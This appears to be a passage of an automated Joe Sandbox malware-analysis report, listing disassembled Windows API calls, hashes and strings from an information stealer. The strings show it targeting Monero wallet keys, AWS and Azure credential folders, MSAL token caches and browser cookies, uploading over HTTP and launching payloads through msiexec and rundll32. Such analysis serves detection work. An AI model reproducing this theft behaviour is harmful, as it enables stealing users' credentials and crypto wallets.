                                      • lstrlen.KERNEL32(00000000), ref: 00A35EFF
                                      • lstrlen.KERNEL32(00000000), ref: 00A35F28
                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00A35F41
                                      • lstrlen.KERNEL32(00000000,?,?), ref: 00A35F6B
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00A35F7F
                                      • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00A35F9C
                                      • InternetCloseHandle.WININET(00000000), ref: 00A36000
                                      • InternetCloseHandle.WININET(00000000), ref: 00A3600D
                                      • HttpOpenRequestA.WININET(00000000,0131F4E0,?,0131EE20,00000000,00000000,00400100,00000000), ref: 00A35C48
                                        • Part of subcall function 00A4ACC0: lstrlen.KERNEL32(?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A4ACD5
                                        • Part of subcall function 00A4ACC0: lstrcpy.KERNEL32(00000000), ref: 00A4AD14
                                        • Part of subcall function 00A4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00A4AD22
                                        • Part of subcall function 00A4ABB0: lstrcpy.KERNEL32(?,00A50E1A), ref: 00A4AC15
                                        • Part of subcall function 00A4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00A4AC82
                                        • Part of subcall function 00A4AC30: lstrcat.KERNEL32(00000000), ref: 00A4AC92
                                      • InternetCloseHandle.WININET(00000000), ref: 00A36017
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                       • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                      • String ID: "$"$------$------$------
                                      • API String ID: 874700897-2180234286
                                      • Opcode ID: be2421ed5ae6272c0311b149ad218cf69eebedd824e896a170d22218daec40e3
                                      • Instruction ID: e8e8a5e6de832605196f6e230b0841f43edf19ac3d30e26b89b3855c161945aa
                                      • Opcode Fuzzy Hash: be2421ed5ae6272c0311b149ad218cf69eebedd824e896a170d22218daec40e3
                                      • Instruction Fuzzy Hash: CA123076960128ABDB14EBA0DDA5FEEB339FF64700F004599F10A62191EF302E49CF61
                                      APIs
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                        • Part of subcall function 00A4ACC0: lstrlen.KERNEL32(?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A4ACD5
                                        • Part of subcall function 00A4ACC0: lstrcpy.KERNEL32(00000000), ref: 00A4AD14
                                        • Part of subcall function 00A4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00A4AD22
                                        • Part of subcall function 00A4ABB0: lstrcpy.KERNEL32(?,00A50E1A), ref: 00A4AC15
                                        • Part of subcall function 00A48CF0: GetSystemTime.KERNEL32(00A50E1B,0131E198,00A505B6,?,?,00A313F9,?,0000001A,00A50E1B,00000000,?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A48D16
                                        • Part of subcall function 00A4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00A4AC82
                                        • Part of subcall function 00A4AC30: lstrcat.KERNEL32(00000000), ref: 00A4AC92
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00A3D083
                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00A3D1C7
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00A3D1CE
                                      • lstrcat.KERNEL32(?,00000000), ref: 00A3D308
                                      • lstrcat.KERNEL32(?,00A51570), ref: 00A3D317
                                      • lstrcat.KERNEL32(?,00000000), ref: 00A3D32A
                                      • lstrcat.KERNEL32(?,00A51574), ref: 00A3D339
                                      • lstrcat.KERNEL32(?,00000000), ref: 00A3D34C
                                      • lstrcat.KERNEL32(?,00A51578), ref: 00A3D35B
                                      • lstrcat.KERNEL32(?,00000000), ref: 00A3D36E
                                      • lstrcat.KERNEL32(?,00A5157C), ref: 00A3D37D
                                      • lstrcat.KERNEL32(?,00000000), ref: 00A3D390
                                      • lstrcat.KERNEL32(?,00A51580), ref: 00A3D39F
                                      • lstrcat.KERNEL32(?,00000000), ref: 00A3D3B2
                                      • lstrcat.KERNEL32(?,00A51584), ref: 00A3D3C1
                                      • lstrcat.KERNEL32(?,00000000), ref: 00A3D3D4
                                      • lstrcat.KERNEL32(?,00A51588), ref: 00A3D3E3
                                        • Part of subcall function 00A4AB30: lstrlen.KERNEL32(00A34F55,?,?,00A34F55,00A50DDF), ref: 00A4AB3B
                                        • Part of subcall function 00A4AB30: lstrcpy.KERNEL32(00A50DDF,00000000), ref: 00A4AB95
                                      • lstrlen.KERNEL32(?), ref: 00A3D42A
                                      • lstrlen.KERNEL32(?), ref: 00A3D439
                                        • Part of subcall function 00A4AD80: StrCmpCA.SHLWAPI(00000000,00A51568,00A3D2A2,00A51568,00000000), ref: 00A4AD9F
                                      • DeleteFileA.KERNEL32(00000000), ref: 00A3D4B4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                       • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                      • String ID:
                                      • API String ID: 1956182324-0
                                      • Opcode ID: 119c905552fc026fd1b964d6e1c2fa396a8e2ce8cb806d1617083047d749167a
                                      • Instruction ID: 0858517d8c9d691b0bc9f4f5f5d07816c2cf65bccdc47fb4e44db9c57af6f48d
                                      • Opcode Fuzzy Hash: 119c905552fc026fd1b964d6e1c2fa396a8e2ce8cb806d1617083047d749167a
                                      • Instruction Fuzzy Hash: 3CE11F75D50208ABDB04EBA0DE96EEE7379BFA4301F104558F106A61A1DE31BE09CB75
                                      APIs
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                        • Part of subcall function 00A4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00A4AC82
                                        • Part of subcall function 00A4AC30: lstrcat.KERNEL32(00000000), ref: 00A4AC92
                                        • Part of subcall function 00A4ABB0: lstrcpy.KERNEL32(?,00A50E1A), ref: 00A4AC15
                                        • Part of subcall function 00A4ACC0: lstrlen.KERNEL32(?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A4ACD5
                                        • Part of subcall function 00A4ACC0: lstrcpy.KERNEL32(00000000), ref: 00A4AD14
                                        • Part of subcall function 00A4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00A4AD22
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0131D530,00000000,?,00A51544,00000000,?,?), ref: 00A3CB6C
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00A3CB89
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00A3CB95
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00A3CBA8
                                      • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00A3CBD9
                                      • StrStrA.SHLWAPI(?,0131D560,00A50B56), ref: 00A3CBF7
                                      • StrStrA.SHLWAPI(00000000,0131D590), ref: 00A3CC1E
                                      • StrStrA.SHLWAPI(?,0131DB20,00000000,?,00A51550,00000000,?,00000000,00000000,?,01318BB8,00000000,?,00A5154C,00000000,?), ref: 00A3CDA2
                                      • StrStrA.SHLWAPI(00000000,0131DA40), ref: 00A3CDB9
                                        • Part of subcall function 00A3C920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00A3C971
                                        • Part of subcall function 00A3C920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00A3C97C
                                      • StrStrA.SHLWAPI(?,0131DA40,00000000,?,00A51554,00000000,?,00000000,01318B48), ref: 00A3CE5A
                                      • StrStrA.SHLWAPI(00000000,01318A98), ref: 00A3CE71
                                        • Part of subcall function 00A3C920: lstrcat.KERNEL32(?,00A50B47), ref: 00A3CA43
                                        • Part of subcall function 00A3C920: lstrcat.KERNEL32(?,00A50B4B), ref: 00A3CA57
                                        • Part of subcall function 00A3C920: lstrcat.KERNEL32(?,00A50B4E), ref: 00A3CA78
                                      • lstrlen.KERNEL32(00000000), ref: 00A3CF44
                                      • CloseHandle.KERNEL32(00000000), ref: 00A3CF9C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                       • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                      • String ID:
                                      • API String ID: 3744635739-3916222277
                                      • Opcode ID: 5002025569fbcfde50ae40a43987ba7a53241ac4c4e6764c73b0138d69bb025e
                                      • Instruction ID: 1ee90bff1c502112d9d7a54a561d2c459883aa7c7a3549004ea12b90b2df28be
                                      • Opcode Fuzzy Hash: 5002025569fbcfde50ae40a43987ba7a53241ac4c4e6764c73b0138d69bb025e
                                      • Instruction Fuzzy Hash: 56E10076940118ABDB14EBA4DDA2FEEB779FFA4300F004559F106A7191EF306A49CB61
                                      APIs
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                      • RegOpenKeyExA.ADVAPI32(00000000,0131B408,00000000,00020019,00000000,00A505BE), ref: 00A48534
                                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00A485B6
                                      • wsprintfA.USER32 ref: 00A485E9
                                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00A4860B
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00A4861C
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00A48629
                                        • Part of subcall function 00A4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00A4AAF6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseOpenlstrcpy$Enumwsprintf
                                      • String ID: - $%s\%s$?
                                      • API String ID: 3246050789-3278919252
                                      • Opcode ID: 2966ca39331f3d4b87fedc1e9122f723db12391d3e6d293d4a0e747cbc041ba3
                                      • Instruction ID: e1117bc35ef9bf1dd2fd2c9d7f86175d3a06af75389c0ee89141eb025811d625
                                      • Opcode Fuzzy Hash: 2966ca39331f3d4b87fedc1e9122f723db12391d3e6d293d4a0e747cbc041ba3
                                      • Instruction Fuzzy Hash: 7E812B75950218ABEB24DB54DD91FEAB7B8FF58300F1086D8E109A6180DF746F89CFA1
                                      APIs
                                        • Part of subcall function 00A48F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00A48F9B
                                      • lstrcat.KERNEL32(?,00000000), ref: 00A45000
                                      • lstrcat.KERNEL32(?,\.azure\), ref: 00A4501D
                                        • Part of subcall function 00A44B60: wsprintfA.USER32 ref: 00A44B7C
                                        • Part of subcall function 00A44B60: FindFirstFileA.KERNEL32(?,?), ref: 00A44B93
                                      • lstrcat.KERNEL32(?,00000000), ref: 00A4508C
                                      • lstrcat.KERNEL32(?,\.aws\), ref: 00A450A9
                                        • Part of subcall function 00A44B60: StrCmpCA.SHLWAPI(?,00A50FC4), ref: 00A44BC1
                                        • Part of subcall function 00A44B60: StrCmpCA.SHLWAPI(?,00A50FC8), ref: 00A44BD7
                                        • Part of subcall function 00A44B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00A44DCD
                                        • Part of subcall function 00A44B60: FindClose.KERNEL32(000000FF), ref: 00A44DE2
                                      • lstrcat.KERNEL32(?,00000000), ref: 00A45118
                                      • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00A45135
                                        • Part of subcall function 00A44B60: wsprintfA.USER32 ref: 00A44C00
                                        • Part of subcall function 00A44B60: StrCmpCA.SHLWAPI(?,00A508D3), ref: 00A44C15
                                        • Part of subcall function 00A44B60: wsprintfA.USER32 ref: 00A44C32
                                        • Part of subcall function 00A44B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00A44C6E
                                        • Part of subcall function 00A44B60: lstrcat.KERNEL32(?,0131F450), ref: 00A44C9A
                                        • Part of subcall function 00A44B60: lstrcat.KERNEL32(?,00A50FE0), ref: 00A44CAC
                                        • Part of subcall function 00A44B60: lstrcat.KERNEL32(?,?), ref: 00A44CC0
                                        • Part of subcall function 00A44B60: lstrcat.KERNEL32(?,00A50FE4), ref: 00A44CD2
                                        • Part of subcall function 00A44B60: lstrcat.KERNEL32(?,?), ref: 00A44CE6
                                        • Part of subcall function 00A44B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00A44CFC
                                        • Part of subcall function 00A44B60: DeleteFileA.KERNEL32(?), ref: 00A44D81
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                      • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                      • API String ID: 949356159-974132213
                                      • Opcode ID: cbf8a6eb9dd98466908626e35f72bfc5cdbd48edfa5296a76478f84fb9c0764f
                                      • Instruction ID: c0e6ba835aba913a4c109cd84b8d9e3d8907040247ffd8899c6d034c2c73bdde
                                      • Opcode Fuzzy Hash: cbf8a6eb9dd98466908626e35f72bfc5cdbd48edfa5296a76478f84fb9c0764f
                                      • Instruction Fuzzy Hash: E041927A94020467DB50F770ED5BFED3328ABA4701F404854B649A60C1EEB56BCCCB92
                                      APIs
                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00A491FC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateGlobalStream
                                      • String ID: image/jpeg
                                      • API String ID: 2244384528-3785015651
                                      • Opcode ID: f38e04283d6768a97413675a51faad426253d98f20af326d05d552ba6f6130f1
                                      • Instruction ID: 234e06f6e91a414ab114db0675239ebe4f6279c462f03bce804f3639df6229fa
                                      • Opcode Fuzzy Hash: f38e04283d6768a97413675a51faad426253d98f20af326d05d552ba6f6130f1
                                      • Instruction Fuzzy Hash: CA71AC75E14208ABDB14DFE4DD89FEEB778BB88700F108518F51AEB290DB75A904CB61
                                      APIs
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00A43415
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00A435AD
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00A4373A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExecuteShell$lstrcpy
                                      • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                      • API String ID: 2507796910-3625054190
                                      • Opcode ID: ac0a51e5a9f98300f7031bd58875a6f193a291e45a60fa8da96836ebcb3196a8
                                      • Instruction ID: 23037924ea46b065fb14618fec2a71d3c713c678f71a26d30d8b079ad67de6a6
                                      • Opcode Fuzzy Hash: ac0a51e5a9f98300f7031bd58875a6f193a291e45a60fa8da96836ebcb3196a8
                                      • Instruction Fuzzy Hash: 1412107A9501189ADB04FBE0DEA2FEDB739AFA4300F004599F50666192EF346F49CF61
                                      APIs
                                        • Part of subcall function 00A39A50: InternetOpenA.WININET(00A50AF6,00000001,00000000,00000000,00000000), ref: 00A39A6A
                                      • lstrcat.KERNEL32(?,cookies), ref: 00A39CAF
                                      • lstrcat.KERNEL32(?,00A512C4), ref: 00A39CC1
                                      • lstrcat.KERNEL32(?,?), ref: 00A39CD5
                                      • lstrcat.KERNEL32(?,00A512C8), ref: 00A39CE7
                                      • lstrcat.KERNEL32(?,?), ref: 00A39CFB
                                      • lstrcat.KERNEL32(?,.txt), ref: 00A39D0D
                                      • lstrlen.KERNEL32(00000000), ref: 00A39D17
                                      • lstrlen.KERNEL32(00000000), ref: 00A39D26
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
